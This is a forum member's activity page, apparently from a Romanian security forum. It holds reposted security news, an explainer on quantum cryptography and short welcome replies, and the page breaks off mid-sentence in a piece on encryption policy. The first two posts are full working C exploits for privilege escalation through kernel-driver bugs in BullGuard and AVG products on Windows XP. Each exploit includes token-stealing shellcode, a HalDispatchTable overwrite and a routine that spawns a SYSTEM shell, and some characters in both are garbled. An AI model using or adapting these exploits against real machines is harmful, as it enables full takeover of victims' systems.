Jump to content

Aerosol

Active Members
 View Profile  See their activity

  • Posts

    3453

  • Joined

  • Last visited

  • Days Won

    22

 Content Type 

Everything posted by Aerosol

  1. Aerosol
    /* Exploit Title - BullGuard Multiple Products Arbitrary Write Privilege Escalation Date - 04th February 2015 Discovered by - Parvez Anwar (@parvezghh) Vendor Homepage - http://www.bullguard.com/ Tested Version - 14.1.285.4 Driver Version - 1.0.0.6 - BdAgent.sys Tested on OS - 32bit Windows XP SP3 OSVDB - http://www.osvdb.org/show/osvdb/114478 CVE ID - CVE-2014-9642 Vendor fix url - http://www.bullguard.com/about/release-notes.aspx Fixed Version - 15.0.288.1 Fixed driver ver - 1.0.0.7 Note ---- Overwritten HAL dispatch table after exploit kd> dps nt!HalDispatchTable l c 8054ccb8 00000003 8054ccbc 00340000 8054ccc0 00010000 8054ccc4 0a060002 8054ccc8 ee657645 8054cccc 00000001 8054ccd0 00000001 8054ccd4 867c1bf0 8054ccd8 80613f7b nt!IoSetPartitionInformation 8054ccdc 806141ef nt!IoWritePartitionTable 8054cce0 8052d157 nt!CcHasInactiveViews 8054cce4 804e42d1 nt!ObpTraceDepth+0x19 7 pointers get overwritten. Since input buffer is in our control and pointers are static in XP I've triggered the overwrite again restoring the pointers. */ #include <stdio.h> #include <windows.h> #define BUFSIZE 4096 typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { PVOID Unknown1; PVOID Unknown2; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT NameLength; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; typedef enum _SYSTEM_INFORMATION_CLASS { SystemModuleInformation = 11, SystemHandleInformation = 16 } SYSTEM_INFORMATION_CLASS; typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)( SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)( DWORD ProfileSource, PULONG Interval); typedef void (*FUNCTPTR)(); // Windows XP SP3 #define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct #define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct #define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct #define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct BYTE token_steal_xp[] = { 0x52, // push edx Save edx on the stack 0x53, // push ebx Save ebx on the stack 0x33,0xc0, // xor eax, eax eax = 0 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD 0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS 0x8b,0xc8, // mov ecx, eax 0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN 0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks 0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks 0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process) 0x75,0xe8, // jne ---- 0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX 0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS 0x5b, // pop ebx Restores ebx 0x5a, // pop edx Restores edx 0xc2,0x08 // ret 8 Away from the kernel }; BYTE restore_pointers_xp[] = // kd> dps nt!HalDispatchTable "\xf2\xa3\x6f\x80" // 8054ccbc 806fa3f2 hal!HaliQuerySystemInformation "\xce\xa3\x6f\x80" // 8054ccc0 806fa3ce hal!HaliSetSystemInformation "\x0b\x46\x61\x80" // 8054ccc4 8061460b nt!xHalQueryBusSlots "\x00\x00\x00\x00" // 8054ccc8 00000000 "\x4d\xac\x50\x80" // 8054cccc 8050ac4d nt!HalExamineMBR "\x89\x6f\x5c\x80" // 8054ccd0 805c6f89 nt!IoAssignDriveLetters "\xe5\x4a\x5c\x80"; // 8054ccd4 805c4ae5 nt!IoReadPartitionTable DWORD HalDispatchTableAddress() { _NtQuerySystemInformation NtQuerySystemInformation; PSYSTEM_MODULE_INFORMATION pModuleInfo; DWORD HalDispatchTable; CHAR kFullName[256]; PVOID kBase = NULL; LPSTR kName; HMODULE Kernel; FUNCTPTR Hal; ULONG len; NTSTATUS status; NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation"); if (!NtQuerySystemInformation) { printf("[-] Unable to resolve NtQuerySystemInformation\n\n"); return -1; } status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len); if (!status) { printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status); return -1; } pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len); if(pModuleInfo == NULL) { printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n"); return -1; } status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len); memset(kFullName, 0x00, sizeof(kFullName)); strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName); kBase = pModuleInfo->Module[0].Base; printf("[i] Kernel base name %s\n", kFullName); kName = strrchr(kFullName, '\\'); Kernel = LoadLibraryA(++kName); if(Kernel == NULL) { printf("[-] Failed to load kernel base\n\n"); return -1; } Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable"); if(Hal == NULL) { printf("[-] Failed to find HalDispatchTable\n\n"); return -1; } printf("[i] HalDispatchTable address 0x%08x\n", Hal); printf("[i] Kernel handle 0x%08x\n", Kernel); printf("[i] Kernel base address 0x%08x\n", kBase); HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase); printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable); if(!HalDispatchTable) { printf("[-] Failed to calculate HalDispatchTable\n\n"); return -1; } return HalDispatchTable; } int GetWindowsVersion() { int v = 0; DWORD version = 0, minVersion = 0, majVersion = 0; version = GetVersion(); minVersion = (DWORD)(HIBYTE(LOWORD(version))); majVersion = (DWORD)(LOBYTE(LOWORD(version))); if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP; if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7"; if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003; return v; } void spawnShell() { STARTUPINFOA si; PROCESS_INFORMATION pi; ZeroMemory(?, sizeof(pi)); ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); si.cb = sizeof(si); si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_SHOWNORMAL; if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, ?)) { printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError()); return; } CloseHandle(pi.hThread); CloseHandle(pi.hProcess); } int main(int argc, char *argv[]) { _NtQueryIntervalProfile NtQueryIntervalProfile; LPVOID input[1] = {0}; LPVOID addrtoshell; HANDLE hDevice; DWORD dwRetBytes = 0; DWORD HalDispatchTableTarget; ULONG time = 0; unsigned char devhandle[MAX_PATH]; printf("-------------------------------------------------------------------------------\n"); printf(" BullGuard Multiple Products (bdagent.sys) Arbitrary Write EoP Exploit \n"); printf(" Tested on Windows XP SP3 (32bit) \n"); printf("-------------------------------------------------------------------------------\n\n"); if (GetWindowsVersion() == 1) { printf("[i] Running Windows XP\n"); } if (GetWindowsVersion() == 0) { printf("[i] Exploit not supported on this OS\n\n"); return -1; } sprintf(devhandle, "\\\\.\\%s", "bdagent"); NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile"); if (!NtQueryIntervalProfile) { printf("[-] Unable to resolve NtQueryIntervalProfile\n\n"); return -1; } addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if(addrtoshell == NULL) { printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError()); return -1; } printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell); memset(addrtoshell, 0x90, BUFSIZE); memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp)); printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp)); hDevice = CreateFile(devhandle, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError()); return -1; } else { printf("[+] Open %s device successful\n", devhandle); } HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD); printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget); input[0] = addrtoshell; // input buffer contents gets written to our output buffer address printf("[+] Input buffer contents %08x\n", input[0]); printf("[~] Press any key to send Exploit . . .\n"); getch(); DeviceIoControl(hDevice, 0x0022405c, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); printf("[+] Buffer sent\n"); printf("[+] Spawning SYSTEM Shell\n"); NtQueryIntervalProfile(2, &time); spawnShell(); printf("[+] Restoring Hal dispatch table pointers\n\n"); DeviceIoControl(hDevice, 0x0022405c, restore_pointers_xp, sizeof(restore_pointers_xp)-1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); CloseHandle(hDevice); return 0; } Source
  2. Aerosol
    /* Exploit Title - AVG Internet Security 2015 Arbitrary Write Privilege Escalation Date - 04th February 2015 Discovered by - Parvez Anwar (@parvezghh) Vendor Homepage - http://www.avg.com/ Tested Version - 2015.0.5315 Driver Version - 15.0.0.5204 - avgtdix.sys Tested on OS - 32bit Windows XP SP3 OSVDB - http://www.osvdb.org/show/osvdb/113824 CVE ID - CVE-2014-9632 Vendor fix url - http://www.avg.com/eu-en/avg-release-notes Fixed Version - 2015.0.5557 Fixed driver ver - 15.0.0.5553 Note ---- Overwritten HAL dispatch table after exploit kd> dps nt!HalDispatchTable l c 8054ccb8 00000003 8054ccbc 00340000 8054ccc0 8678d9a0 8054ccc4 0a050002 8054ccc8 6e66744e 8054cccc 001c0707 8054ccd0 00000180 8054ccd4 000001a4 8054ccd8 867d6690 8054ccdc 86706480 8054cce0 00000000 8054cce4 804e42d1 nt!ObpTraceDepth+0x19 10 pointers get overwritten. Since input buffer is in our control and pointers are static in XP I've triggered the overwrite again restoring the pointers. */ #include <stdio.h> #include <windows.h> #define BUFSIZE 4096 typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { PVOID Unknown1; PVOID Unknown2; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT NameLength; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; typedef enum _SYSTEM_INFORMATION_CLASS { SystemModuleInformation = 11, SystemHandleInformation = 16 } SYSTEM_INFORMATION_CLASS; typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)( SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)( DWORD ProfileSource, PULONG Interval); typedef void (*FUNCTPTR)(); // Windows XP SP3 #define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct #define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct #define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct #define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct BYTE token_steal_xp[] = { 0x52, // push edx Save edx on the stack 0x53, // push ebx Save ebx on the stack 0x33,0xc0, // xor eax, eax eax = 0 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD 0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS 0x8b,0xc8, // mov ecx, eax 0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN 0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks 0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks 0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process) 0x75,0xe8, // jne ---- 0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX 0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS 0x5b, // pop ebx Restores ebx 0x5a, // pop edx Restores edx 0xc2,0x08 // ret 8 Away from the kernel }; BYTE restore_pointers_xp[] = // kd> dps nt!HalDispatchTable "\xf2\xa3\x6f\x80" // 8054ccbc 806fa3f2 hal!HaliQuerySystemInformation "\xce\xa3\x6f\x80" // 8054ccc0 806fa3ce hal!HaliSetSystemInformation "\x0b\x46\x61\x80" // 8054ccc4 8061460b nt!xHalQueryBusSlots "\x00\x00\x00\x00" // 8054ccc8 00000000 "\x4d\xac\x50\x80" // 8054cccc 8050ac4d nt!HalExamineMBR "\x89\x6f\x5c\x80" // 8054ccd0 805c6f89 nt!IoAssignDriveLetters "\xe5\x4a\x5c\x80" // 8054ccd4 805c4ae5 nt!IoReadPartitionTable "\x7b\x3f\x61\x80" // 8054ccd8 80613f7b nt!IoSetPartitionInformation "\xef\x41\x61\x80" // 8054ccdc 806141ef nt!IoWritePartitionTable "\x57\xd1\x52\x80"; // 8054cce0 8052d157 nt!CcHasInactiveViews DWORD HalDispatchTableAddress() { _NtQuerySystemInformation NtQuerySystemInformation; PSYSTEM_MODULE_INFORMATION pModuleInfo; DWORD HalDispatchTable; CHAR kFullName[256]; PVOID kBase = NULL; LPSTR kName; HMODULE Kernel; FUNCTPTR Hal; ULONG len; NTSTATUS status; NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation"); if (!NtQuerySystemInformation) { printf("[-] Unable to resolve NtQuerySystemInformation\n\n"); return -1; } status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len); if (!status) { printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status); return -1; } pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len); if(pModuleInfo == NULL) { printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n"); return -1; } status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len); memset(kFullName, 0x00, sizeof(kFullName)); strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName); kBase = pModuleInfo->Module[0].Base; printf("[i] Kernel base name %s\n", kFullName); kName = strrchr(kFullName, '\\'); Kernel = LoadLibraryA(++kName); if(Kernel == NULL) { printf("[-] Failed to load kernel base\n\n"); return -1; } Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable"); if(Hal == NULL) { printf("[-] Failed to find HalDispatchTable\n\n"); return -1; } printf("[i] HalDispatchTable address 0x%08x\n", Hal); printf("[i] Kernel handle 0x%08x\n", Kernel); printf("[i] Kernel base address 0x%08x\n", kBase); HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase); printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable); if(!HalDispatchTable) { printf("[-] Failed to calculate HalDispatchTable\n\n"); return -1; } return HalDispatchTable; } int GetWindowsVersion() { int v = 0; DWORD version = 0, minVersion = 0, majVersion = 0; version = GetVersion(); minVersion = (DWORD)(HIBYTE(LOWORD(version))); majVersion = (DWORD)(LOBYTE(LOWORD(version))); if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP; if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7"; if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003; return v; } void spawnShell() { STARTUPINFOA si; PROCESS_INFORMATION pi; ZeroMemory(?, sizeof(pi)); ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); si.cb = sizeof(si); si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_SHOWNORMAL; if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, ?)) { printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError()); return; } CloseHandle(pi.hThread); CloseHandle(pi.hProcess); } int main(int argc, char *argv[]) { _NtQueryIntervalProfile NtQueryIntervalProfile; LPVOID input[1] = {0}; LPVOID addrtoshell; HANDLE hDevice; DWORD dwRetBytes = 0; DWORD HalDispatchTableTarget; ULONG time = 0; unsigned char devhandle[MAX_PATH]; printf("-------------------------------------------------------------------------------\n"); printf(" AVG Internet Security 2015 (avgtdix.sys) Arbitrary Write EoP Exploit \n"); printf(" Tested on Windows XP SP3 (32bit) \n"); printf("-------------------------------------------------------------------------------\n\n"); if (GetWindowsVersion() == 1) { printf("[i] Running Windows XP\n"); } if (GetWindowsVersion() == 0) { printf("[i] Exploit not supported on this OS\n\n"); return -1; } sprintf(devhandle, "\\\\.\\%s", "avgtdi"); NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile"); if (!NtQueryIntervalProfile) { printf("[-] Unable to resolve NtQueryIntervalProfile\n\n"); return -1; } addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if(addrtoshell == NULL) { printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError()); return -1; } printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell); memset(addrtoshell, 0x90, BUFSIZE); memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp)); printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp)); hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError()); return -1; } else { printf("[+] Open %s device successful\n", devhandle); } HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD); printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget); input[0] = addrtoshell; // input buffer contents gets written to our output buffer address printf("[+] Input buffer contents %08x\n", input[0]); printf("[~] Press any key to send Exploit . . .\n"); getch(); DeviceIoControl(hDevice, 0x830020f8, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); printf("[+] Buffer sent\n"); printf("[+] Spawning SYSTEM Shell\n"); NtQueryIntervalProfile(2, &time); spawnShell(); printf("[+] Restoring Hal dispatch table pointers\n\n"); DeviceIoControl(hDevice, 0x830020f8, restore_pointers_xp, sizeof(restore_pointers_xp)-1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); CloseHandle(hDevice); return 0; } Source
  3. Aerosol
    “Quantum cryptography uses photons and physics to generate cryptographic keys” What is quantum cryptography? Quantum cryptography is NOT a new algorithm to encrypt and decrypt data. Rather it is a technique of using photons to generate a cryptographic key and transmit it to a receiver using a suitable communication channel. A cryptographic key plays the most important role in cryptography; it is used to encrypt/decrypt data. Types of cryptography There are two types of cryptography: Symmetric Cryptography Asymmetric Cryptography Symmetric Key Cryptography is also known as Secret Key Cryptography (SKC) where a key (any text, numbers, etc.) is used to encrypt data, and the same key is used to decrypt that data. The smallest change in the secret key will fail to decrypt an encrypted message. For example, text that is encrypted using AES encryption with key Infosec will fail to decrypt another cipher text which was encrypted using key INFOSEC. Asymmetric Key Cryptography is also known as Public Key Cryptography (PKC) where two sets of keys are generated. One is called a public key and other is called a private key. A public key is used to encrypt data whereas a private key is used to decrypt that data. Similar to symmetric cryptography, the smallest change in any of the two keys will make them useless to get the original data. A benefit of asymmetric cryptography is that you can share the public key with the whole world so that they can use it to send you encrypted data. And the private key is stored safely with the owner and is used for decryption. One disadvantage of this type of cryptography is that if your private key is lost or leaked then you will have to generate a new pair of public and private keys. Why do we need quantum cryptography? Every new solution is made because of some problem we have with the current solution. The case is no different with this one. Let us see the problem first. The problem with symmetric cryptography is that the same key is used to both encrypt and decrypt the messages. If for some reason that key is leaked to some third party, then it can be used to decrypt communication between two trusted devices or persons. In the worst case, the communication can be intercepted and altered. Today’s huge computing power (these days even Xbox and PlayStation at homes have huge power) can be used to crack a key used in symmetric cryptography. Another major problem with this type of cryptography is how to decide which key to use and how to share between trusted devices or persons. Imagine a key has to be shared between India and America, then that communication too has to be secured before sharing the key. Coming to the problem of asymmetric cryptography, it is not something we are facing right now, but seeing the pace of changing technology, we will be facing it soon. Most of the keys used in public key cryptography are at least 128-bit keys which are considered to be very strong. An attacker can easily get hold of the public key because it is shared by the user. But to generate a private key for that public key involves huge amounts of calculations with permutations and combinations. At present a supercomputer is what you need to crack a PKC and many years to complete it. But it will become pretty much possible with the use of quantum computers which use quantum physics to operate and have very high efficiency and computation speed. A quantum computer is a theoretical concept right now and will utilize atoms and molecules to perform computing at a very high speed. According to Moore’s Law, in an integrated circuit the number of transistors doubles every 2 years. It means that the speed of computing will increase to a very high level every two years. Right now Intel i7 processor integrated circuit has 1.4 billion transistors. Clearly, in the coming decades computing speed will increase and the age of quantum computers will become a reality. Now from our above discussion it is very clear that the biggest problem with the current cryptographic techniques is keys and their security in transmission. How does quantum cryptography work? In quantum cryptography, the source sends a key to the receiver, and this key can be used to decrypt any future messages that are to be sent. When the key has been successfully sent and received, the next step is to send encrypted data to the receiver and let it decrypt and process that data. Important: the key is the main part of cryptography and should be sent in a very secure manner. Quantum cryptography has a different way of sending the key to the receiver. It uses photons to send a key. What is a photon, and how it is used? A photon is the smallest particle of light. It has three types of spins: Horizontal Vertical Diagonal (Right and Left) A photon has the capability to spin in all three states at the same time. How do we use it in cryptography? Another part of physics and photons is polarization. Polarization can be used to polarize (pass through a filter) a photon so that it has a particular spin, vertical or horizontal or diagonal. Polarization of a photon is performed using polarization filters. Now comes Heisenberg’s Uncertainty Principle, which states that it is impossible to measure together the speed and position of a particle with highest accuracy, and its state will change when measured. In other words, if an eavesdropper intercepts the transmitted photons and passes it through its polarizer, if it is wrong it will make the receiver get the wrong photon. Hence the interception of communication will get detected. It means that if a photon is polarized using say X filter (Diagonal Polarization), then to get the original spin of the photon only X filter can be used. If a + filter (Rectilinear Polarization) is used on the photon, then it will either be absorbed by the filter or the polarized photon, will be of different spin than the original photon. For example, a horizontal spinning photon when passed through a wrong filter will lead to diagonal spin, which is incorrect. The below table shows output spin for used polarization: Polarization Output Spin Rectilinear Polarization (+) Horizontal Spin (–) Vertical Spin (|) Diagonal Polarization (X) Left Diagonal Spin () Right Diagonal Spin (/) How to send data using photons One of the major concerns before using quantum cryptography is how to associate data with photons. This problem can be easily solved by assigning the spin of every photon as 0 or 1. Please see the sample table below: Spin Horizontal Spin (–) Vertical Spin (|) Left Diagonal Spin () Right Diagonal Spin (/) Value 0 1 0 1 magine Alice applies polarizations on photons and gets the spin and keeps a note of it. Every spin has a value associated with it. Please refer to the table below: Do note that Alice is able to find the spin of photon after polarization using four detectors (horizontal, vertical, right diagonal, left diagonal). Now the key in binary format is: 0101100110101011 This binary data can be converted into other formats like string and integer, depending upon choice of the users involved in the communication. Let us assume Alice wants the key to be in integer format, so the key will be: In real world implementation, the key should not be this short in length. How to share and verify the key In the above section, Alice applied polarization and calculated the value of the key, which will be transmitted to Bob. Note that transmission of these photons takes place in optical fiber cables. Alice sends the polarized photons to Bob using a suitable communication channel. Bob is listening for incoming photons and randomly applies any polarization (rectilinear or diagonal) and keeps a note of applied polarization, spin and its value. Now when the transmission has completed, Alice and Bob communicate on a public channel which needs not be encrypted. Bob tells Alice only the polarizations (not the spin or value) he applied in the exactly same sequence, and Alice only says YES/NO. This communication will be something like this: In the above communication, Bob gets to know the wrong polarizations. But do note that we have a problem here which is highlighted in orange color. See that Alice said polarization applied is wrong but the spin Bob received had the same bit value (1) as Alice’s. But Bob has no way to find what value Alice has so he has no other way but to discard his results for wrong polarization. After successful key transmission and fixing of wrong polarization, encrypted data can be sent and decrypted when received. Communication interception If a user is intercepting the communication between sender and receiver, then he will have to randomly apply polarization on the photons sent. After polarization, he will forward it to the original sender. But it is impossible for the eavesdropper to guess all polarizations correctly. So when Bob and Alice validate the polarizations, and Bob fails to decrypt the data, then the interception of communication will get detected. Conclusion Privacy and data security is right now of utmost importance to people. With quantum cryptography, secure transmission of data is possible, and chances of it being intercepted and altered are very low. This technology has been implemented in some areas. But is still under deeper research before being widely implemented. Reference: How Quantum Cryptology Works - HowStuffWorks Source
  4. Aerosol

    Salut!

    Aerosol replied to Xivo25's topic in Bine ai venit

    @Xivo25 bine ai venit, tin sa precizez: "mna e site de hacking" ( NU, e Romanian SECURITY Team, nu Hacking) + incearca sa scrii corect. On:// Salut si bafta cu scoala!
  5. Aerosol

    Salut.

    Aerosol replied to kangaroo21's topic in Bine ai venit

    De ce sa fie "anonim" atata timp cat omul nu se ocupa cu nimic ilegal? bai ganditi si voi inainte sa scrieti ceva, sunt multi oameni de pe RST ce nu stau ascunsi. On:// Bun venit!
  6. Aerosol
    Google is offering grants worth up to $3,000 to investigate suspected security flaws as a part of a new "experimental" initiative. Google security engineer Eduardo Vela Nava announced the move in a blog post, promising to offer further incentives for researchers to investigate suspected problems that they would otherwise ignore. "Today we're rolling out a new, experimental programme: Vulnerability Research Grants. These are upfront awards that we will provide to researchers before they ever submit a bug," he explained. "We'll publish different types of vulnerabilities, products and services for which we want to support research beyond our normal vulnerability rewards. "We'll award grants immediately before research begins, with no strings attached. Researchers then pursue the research they applied for, as usual. There will be various tiers of grants, with a maximum of $3,133.70." Google also announced plans to expand its existing bug bounty programme to include flaws in mobile applications. "Also starting today, all mobile applications officially developed by Google on Google Play and iTunes will now be within the scope of the Vulnerability Reward Programme," read the post. Google has been a constant supporter of bug bounty schemes, and announced reforms to its programmes in 2014. Google tripled Chrome bug bounty payments to $15,000 in October prior to launching the Project Zero initiative. Project Zero was launched in July 2014 with the apparent intention of speeding up companies' patch release schedules. The team of researchers does this by initially disclosing flaws privately to the firms responsible and giving them 90 days to release a fix before making the research public. The project was criticised earlier this year for the public disclosure of bugs in Microsoft's Windows and Apple's Mac OS X operating systems. Nava credited the schemes as a success despite the controversy. He revealed that Google paid researchers more than $1.5m for discovering over 500 bugs last year. Source
  7. Aerosol
    Crypto pioneer Phil Zimmermann has labelled UK Prime Minister David Cameron’s anti-encryption plans as "absurd". Zimmermann, creator of the PGP email privacy package, countered Cameron's argument that encryption is creating a means for terrorists and child abusers to communicate in private, arguing instead that intelligence agencies such as GCHQ and the NSA have "never had it so good". Strong encryption technology is one of the few success stories in online security, according to the co-founder of secure communications firm Silent Circle. Cameron is pushing the idea of banning crypto products that UK spies are unable to access, an idea he first floated in a recent speech before lobbying US President Barack Obama on the issue. Unsurprisingly, Zimmermann is unimpressed with an anti-encryption policy the Conservative Party plans to write into its manifesto for the forthcoming UK general election. "It’s absurd," Zimmermann told The Guardian. "We fought the crypto wars in the 1990s, and that matter has been settled. End-to-end encryption is everywhere now: in browsers, online banking. If you have strong encryption between your web browser and your bank, you can’t have a man in the middle from the government wiretapping that." The FBI and intel agencies such as MI5 have been vocal in complaining that strong encryption technologies are paving the path toward a dark web where they will no longer be able to intercept terrorists' communications. Zimmermann said ubiquitous CCTV cameras and other technologies mean that spy agencies are enjoying a "golden age of surveillance" comparable with the world as depicted by TV show Person of Interest. "They can see everything: they’ve got face recognition algorithms looking through cameras on the streets, optical recognition cameras at bridges, tunnels and traffic lights," Zimmermann said. "They can track movements, transactions, who’s having lunch with whom, who’s sleeping with whom. They can see everything!" "To complain that end-to-end encryption is crippling them, well, it's like having a couple of missing pixels in a large display. They have the rest of the display! They’ve never had it so good. They didn’t have this stuff 20 years ago," he added. Cameron's anti-encryption policies would reduce the UK to the level of Colombia 10 years ago, when not even banks were allowed to use encryption, said Zimmermann, who addressed Colombian lawmakers debating the introduction of encryption at the time. "Not even banks! And the banks were getting robbed by hackers (accounts were getting cleaned out) because people like David 